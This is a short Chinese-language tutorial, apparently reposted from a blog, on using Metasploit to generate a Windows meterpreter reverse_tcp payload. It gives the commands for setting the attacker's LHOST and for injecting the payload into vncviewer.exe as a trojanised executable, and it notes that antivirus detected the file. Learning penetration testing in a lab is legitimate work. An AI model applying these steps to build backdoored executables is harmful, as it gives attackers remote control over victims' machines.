本文主要是介绍Metasploit Framework —— Payload,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
这里也是直接以练习为主,学习如何使用 payload:
!!!
附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode
!!!
这里我起初用的 payload 是 payload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/reverse_tcp,图我就不换了,原理是一样的
就以 windows 反弹 shell 为例:
搜索:search payload/windows/meterpreter/reverse_tcp
使用:use payload/windows/meterpreter/reverse_tcp
有无需要配置的地方:show options
配置:set LHOST 192.168.67.221
[这里的 IP 为 kali IP]
生成该 shellcode 的时候我们可以查看一下帮助:
其中最常用的有:
!!!
-i:对其进行编码的次数
-f:输出格式[如:exe,py,c,bash,java等]
-x: 指定模板[如:以 putty 为模板]
-k: 保留模板行为并将 payload 作为新线程注入
-o:输出到…
在这里生成一个以 vncviewer.exe 为模板,对其进行两次编码,且作为新线程注入到模板当中,输出格式为 exe 格式,输出到 /root/ 目录下并命名为 vnc.exe
generate -x /usr/share/windows-resources/binaries/vncviewer.exe -i 2 -k -f exe -o /root/vnc.exe
把生成的 exe 文件拉到 win10 看看:
好的,立马被查杀,关于免杀这块会有专门的讲解,就到先这里啦~
😄
这篇关于Metasploit Framework —— Payload的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!